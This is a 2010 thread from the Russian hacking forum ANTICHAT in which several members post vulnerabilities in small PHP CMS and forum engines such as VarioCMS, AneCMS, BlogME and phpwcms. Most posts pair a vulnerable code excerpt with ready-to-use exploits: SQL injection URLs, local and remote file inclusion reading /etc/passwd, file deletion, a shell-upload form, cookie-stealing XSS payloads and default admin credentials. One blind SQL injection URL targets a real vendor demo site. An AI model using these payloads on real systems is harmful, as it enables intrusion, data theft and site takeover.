HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.03.2010, 21:42
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Product: VarioCMS
Version: 0.5.6
Author:: http://sourceforge.net/projects/variocms/

SQL-Inj

Need: mq=off;

File: /plugins/system/slideshow/upload.php

PHP код:
if (isset($_GET['album_id'])) {
    
$album_id $_GET['album_id'];
  }
....
$sql_insert "INSERT INTO " $db_plugin_prefix "slideshow (album, albumid, image, thumbnail, position) VALUES ('$album', '$album_id', '$image', '0', '$position')";
      
fputs($logfile"$sql_insert\n"); 
Target: http://localhost/bugs/VarioCMS/plugins/system/slideshow/upload.php?album=1&album_id=1'{SQL}.
Columns: 7

Upload Shell

Need: none.

File: /plugins/system/slideshow/upload.php

PHP код:
if (isset($_GET['album_id'])) {
    
$album_id $_GET['album_id'];
  }
..
foreach (
$_FILES as $file => $fileArray) {
    echo(
"File key: $file\n");
    foreach (
$fileArray as $item=>$val) {

    }

//Let's manipulate the received file: in this demo, we just want to remove it!
    
$new_dir $slideshow_path $album_id;
    if (
file_exists($new_dir) == false) {
      
mkdir ($new_dir);
      
mkdir ($new_dir "/fullsize");
      
mkdir ($new_dir "/slideshow");
      
mkdir ($new_dir "/thumbnails");
    }

    
$upload_dir $slideshow_path $album_id "/";
    
$position 65000;
    if (
move_uploaded_file($fileArray['tmp_name'], $upload_dir uml2nouml($fileArray['name']))) { 
Target:
Expl0it ^_^:
Код:
<form  enctype="multipart/form-data" action="http://targethost.com/plugins/system/slideshow/upload.php?album=1" method="get" >
<input type="file" name="Filedata" /><input type="submit" />
<input type="text" name="album_id" value="../../"/>
</form>
album_id = folder to upload shell.
 
Ответить с цитированием

  #2  
Старый 28.03.2010, 14:59
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Product: PithCMS
Version: 0.9.5
Author: http://sourceforge.net/projects/pithcms/

Local File Inclusion



File: newsreader.php

Need: rg=on;

PHP код:
include ("admin/lang/$lang");
include (
"_read_config.inc.php");
include_once (
"inc/cleaner.inc.php"); 
Target: http://targethost.com/newsreader.php?lang=../../../../../../etc/passwd

File: admin/blog.php

Need:logged on target site!

PHP код:
 session_start();
        if (!isset(
$_SESSION['user'])) {
                echo 
"<h2>ACCESS DENIED AND LOGGED</h2>";
                exit;
        }
...
(isset($_POST['filename'])) {
                
//include ("$rootdir/articles/".$_POST['filename']); 
                
include ("../news/".$_POST['filename']); 
            }else{
... 
Target: {POST} http://targethost.com/admin/blog.php?filename=../../../../../../../../../etc/passwd

Remove arbitrary file

File: admin/download_remove.php

Need: logged on target site!

PHP код:
if (isset($_POST['file']) && ($_POST['file'] != "lista.php") && ($_POST['file'] != "index.php") && ($_POST['file'] != "")) { 
        
$file trim($_POST['file']);
        
$object = ("../downloads/$file"); 
Target: {POST} http://targethost.com/admin/download_remove.php?file=../indeX.php
 
Ответить с цитированием

  #3  
Старый 01.04.2010, 10:42
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

MusicBox v3.3

SQL Injection:

/blogs.php?action=edit&newsid=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())+--+
/genre_artists.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7+--+

Пассивная XSS:

/index.php?in=artist&term=%22%3E%3Csсriрt%3Ealert (document.cookie);%3C/sсriрt%3EE&action=search&start=0&x=0&y=0
/index.php?action=top&show=5&type=Artists+order+by+ 1+--+%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3E

Активная XSS:

/member.php?uname=кому будем посылать XSS, в комменты <sсriрt>alert(document.cookie);</sсriрt>


По идеи почти каждый параметр уязвим.

/phpinfo.php
 
Ответить с цитированием

  #4  
Старый 07.04.2010, 15:15
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

BlogME
Product : BlogME 1.1

SQL injection
file : index.php
mq = off
Код:
http://x60unu/index.php?month=4&year=2007'+and+0+union+all+select+version(),version(),3,4,5,6,7,8--+
Код:
http://x60unu/index.php?cat=General'+and+0+union+all+select+1,2,3,4,5,6,7,8--+
Код:
http://x60unu/index.php?when=March%206,%202007'+and+0+union+all+select+1,2,3,4,5,6,7,8--+
SQL in Admin Panel
file : blogroll.php
PHP код:
case 'edit' :
    
            
$sqledit"SELECT * FROM "$prefix ."_blogroll WHERE id=$id";
            
$resultedit db_query($dbname,$sqledit);
            
$editvalues mysql_fetch_array($resultedit); 
result :
Код:
http://x60unu/blogroll.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
PHP код:
$sqldelete"DELETE FROM "$prefix ."_blogroll where id=$id";
            
$resultdelete db_query($dbname,$sqldelete); 
result :
Код:
http://x60unu/blogroll.php?mode=delete&id=1[blind sql]
file : category.php
PHP код:
            $sqledit"SELECT * FROM "$prefix ."_cat WHERE id=$id";
            
$resultedit db_query($dbname,$sqledit);
            
$editvalues mysql_fetch_array($resultedit); 
result:
Код:
http://x60unu/category.php?mode=edit&id=1+and+0+union+all+select+1,2--+
blind sql
PHP код:
sqldelete"DELETE FROM "$prefix ."_cat where id=$id";
            
$resultdelete db_query($dbname,$sqldelete
result :
Код:
http://x60unu/category.php?mode=delete&id=1[blind sql]
file : links.php
PHP код:
            $sqledit"SELECT * FROM "$prefix ."_links WHERE id=$id";
            
$resultedit db_query($dbname,$sqledit);
            
$editvalues mysql_fetch_array($resultedit); 
result :
Код:
http://x60unu/links.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
PHP код:
$sqldelete"DELETE FROM "$prefix ."_links where id=$id";
            
$resultdelete db_query($dbname,$sqldelete); 
Код:
http://x60unu/links.php?mode=delete&id=1[blind sql]
Active Xss
comments --- text comments --- "><script>alert();</script>
з.ы. двиг сплошная дыра
 
Ответить с цитированием

  #5  
Старый 08.04.2010, 13:42
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Продукт:: AEF (форумный движок)
Сайт:: http://www.anelectron.com
Дорк:: "Powered by AEF" (250 000 результатов)
Уязвимость:: Активная XSS.
Уязвимость присутствует из-за небезопасной обработки BB-тегов.
Можно вызвать разрушение тегов, и, как следствие, выполнение javascript-кода.
Пример эксплуатации:

Код:
[*url]http://asd.asd[*email]asd@asd.asd onmouseover=alert() bla=[*/email][*/url]
На выходе получаем:

Код:
<a href="http://asd.asd<a href="mailto:asd@asd.asd onmouseover=alert() bla=" target="_blank">asd@asd.asd onmouseover=alert() bla=</a>" target="_blank">http://asd.asd<a href="mailto:asd@asd.asd onmouseover=alert() bla=" target="_blank">asd@asd.asd onmouseover=alert() bla=</a></a>
Можно также провести атаку через стили (для ie и ff), тогда можно спрятать куски разрушенного тега:

Код:
[*url]http://asd.asd[*email]asd@asd.asd style=display:none;olo:expression(alert());-moz-binding:url() bla=[*/email][*/url]

Последний раз редактировалось Root-access; 08.04.2010 в 13:47..
 
Ответить с цитированием

  #6  
Старый 08.04.2010, 14:28
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Продукт:: Beehive (форумный движок)
Сайт:: http://beehiveforum.sourceforge.net/
Дорк:: "Project Beehive Forum" (?)
Уязвимость:: Активная XSS.
Уязвимость существует из-за недостаточной фильтрации слова javascript в сообщении.
Строчка из /include/fixhtml.php (скрипт "безопасной" обработки html):
PHP код:
$attrib_value preg_replace("/javascript:/ixu"''$attrib_value); 
В движке разрешён html, а это ограничение обходится простым кодированием html (протокол от этого валидность не теряет):
Код:
<img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()" />
 
Ответить с цитированием

  #7  
Старый 08.04.2010, 15:16
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Продукт:: CompactCMS
Сайт:: http://www.compactcms.nl
Дорк:: "Maintained with CompactCMS"
//тут была глупая ошибка, Strilo4ka заметил...
Уязвимость:: Исполнение произвольного кода.
Требования: права админа (админка по умолчанию не запаролена - /admin)
Жмём Create a new page, создаём страничку с php-кодом, затем она инклудится, и мы имеем шелл.

Последний раз редактировалось Root-access; 09.04.2010 в 11:50..
 
Ответить с цитированием

  #8  
Старый 08.04.2010, 23:01
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

AneCMS
Product : Demo AneCMS v1

Blind SQL injection
Код:
http://demo.anecms.com/blog/delete/1/1/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/
Active XSS
comments blog news - "><script>alert();</script>
Код:
http://anecms.com/blog/5/Template_Engine_and_cleaning_time
LFI
rss.php
PHP код:
if(isset($_GET['module']))
    include 
'./modules/'.$_GET['module'].'/rss.php'
Код:
http://x60unu/rss.php?module=../[file]%00
Admin panel
PHP код:
  include './pages/'.$_GET['p'].'.php'
Код:
http://demo.anecms.com/acp/?p=lfi
Код:
http://x60unu/acp/index.php?p=../../[file]%00
Путь
Код:
http://demo.anecms.com/register/next
Дыр тут много

Последний раз редактировалось [x60]unu; 08.04.2010 в 23:19..
 
Ответить с цитированием

  #9  
Старый 09.04.2010, 07:00
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

phpwcms v1.4.5
release 2010

Скачано отсюдо!

XSS + HPP

/image_zoom.php
Код:
..if(empty($_GET["show"])) {

	$width_height = '';
	$img = "img/leer.gif";
	
} else {

	$img 						= base64_decode($_GET["show"]);
	list($img, $width_height)	= explode('?', $img);
	$img 						= str_replace(array('http://', 'https://', 'ftp://'), '', $img);
	$img						= strip_tags($img);
	$width_height				= strip_tags($width_height);
	$img = PHPWCMS_IMAGES.urlencode($img);...
Код:
...<a href="#" title="Close PopUp" onclick="window.close();return false;"><img src="<?php echo $img ?>" alt="" border="0" <?php echo $width_height ?> /></a>...
Result:
1) формируем код, example: адрес_рисунка?onmouseover=alert(1)
2) переводим в base64 - MDRANUFfQDhBQz06MD9vbm1vdXNlb3Zlcj1hbGVydCgxKQ==
3) тулим эту строку гетом в show.

ps админка - /login.php
По умолчанию:
логин - admin;
пасс - phpwcms (md5).

Последний раз редактировалось Strilo4ka; 15.04.2010 в 06:01..
 
Ответить с цитированием

  #10  
Старый 10.04.2010, 22:26
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

AneCMS

Продолжение поста [x60]unu.
RFI
ajax.php!
PHP код:
<?php
include './system/pages/essential.php';
if(isset(
$_POST['p']))
    include 
$_POST['p'];
?>
Условие:
allow_url_include = On

Експлуатация:
Код HTML:
<form method="POST" action="http://localhost/anecms/ajax.php">
<input type="text" name="p" />
<input type="submit" /></form>

Последний раз редактировалось Strilo4ka; 15.04.2010 в 06:00..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ